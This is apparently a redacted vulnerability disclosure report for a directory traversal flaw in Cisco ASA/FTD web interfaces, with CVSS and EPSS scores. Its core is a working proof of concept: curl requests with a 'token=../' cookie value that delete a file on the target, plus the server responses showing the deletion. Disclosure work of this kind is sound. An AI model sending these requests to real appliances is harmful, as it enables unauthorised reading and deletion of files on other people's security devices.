9.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.974 High
EPSS
Percentile
99.9%
Description:
A vulnerability in the interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files.
Vulnerable host:
https://██████/
An exploit could allow the attacker to view or delete arbitrary files on the system.
/+CSCOE+/session_password.html
.> curl -skiL "https://██████/+CSCOE+/session_password.html"
GET /+CSCOE+/session_password.html HTTP/1.1
Host: ███████
User-Agent: curl/7.47.0
Accept: */*
If the target is vulnerable, the response header will display webvpn
header, like:
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Thu, 10 Sep 2020 04:14:27 GMT
X-Frame-Options: SAMEORIGIN
webvpn:
token
in cookie header request.For example, I want to delete this (https://████/+CSCOU+/csco_logo.gif) file.
> curl -Ik https://██████████/+CSCOU+/csco_logo.gif
< HTTP/1.1 200 OK
< Content-Type: image/gif
< Content-Length: 2678
< Cache-Control: max-age=6000
< Connection: Keep-Alive
< Date: Thu, 10 Sep 2020 04:19:54 GMT
< X-Frame-Options: SAMEORIGIN
Request:
> curl -skiL "https://███████/+CSCOE+/session_password.html" \
-H "Cookie: token=../+CSCOU+/csco_logo.gif"
GET /+CSCOE+/session_password.html HTTP/1.1
Host: ███████
Cookie: token=../+CSCOU+/csco_logo.gif
User-Agent: curl/7.47.0
Accept: */*
The following response is shown:
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Thu, 10 Sep 2020 04:21:02 GMT
X-Frame-Options: SAMEORIGIN
webvpn:
File deleted successfully:
> curl -Ik https://██████████/+CSCOU+/csco_logo.gif
< HTTP/1.1 404 Not Found
< Cache-Control: no-cache
< Pragma: no-cache
< Connection: Close
< Date: Thu, 10 Sep 2020 04:21:20 GMT
< X-Frame-Options: SAMEORIGIN
An exploit could allow the attacker to view or delete arbitrary files on the system.
9.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.974 High
EPSS
Percentile
99.9%